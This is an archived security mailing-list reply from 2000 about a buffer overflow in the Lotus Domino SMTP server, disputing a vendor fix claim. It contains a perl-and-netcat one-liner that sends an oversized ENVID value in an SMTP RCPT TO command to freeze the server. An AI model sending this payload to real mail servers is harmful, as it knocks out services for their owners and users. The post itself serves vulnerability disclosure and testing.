mailing list archives
Re: [SAFER] Buffer overflow in Lotus Domino SMTP Server
From: Fyodor <fygrave () SCORPIONS NET>
Date: Mon, 6 Nov 2000 03:27:40 -0500
However, Lotus Notes/Domino Release 5.0.4 QMR fix list indicates that
the problem was already fixed in 5.04.
and click on
Mail Server - Router - SMTP
The SPR# is CDOY4GFP35
Are you sure 5.04 is affected? Or the technote is lying?
Well, at least eval. version for linux platform is vulnerable.
if you want to be confident whether it affects your server or not
here's a small hint to play around : :-)
perl -e 'print "ehlo foo\nmail from:blah () yahoo com\nrcpt to:admin () localhost ENVID=", "A"x900;' | nc lotus.box 25
or something like that.. :)
if all your lotus services get frozen afterwards, you are vulnerable.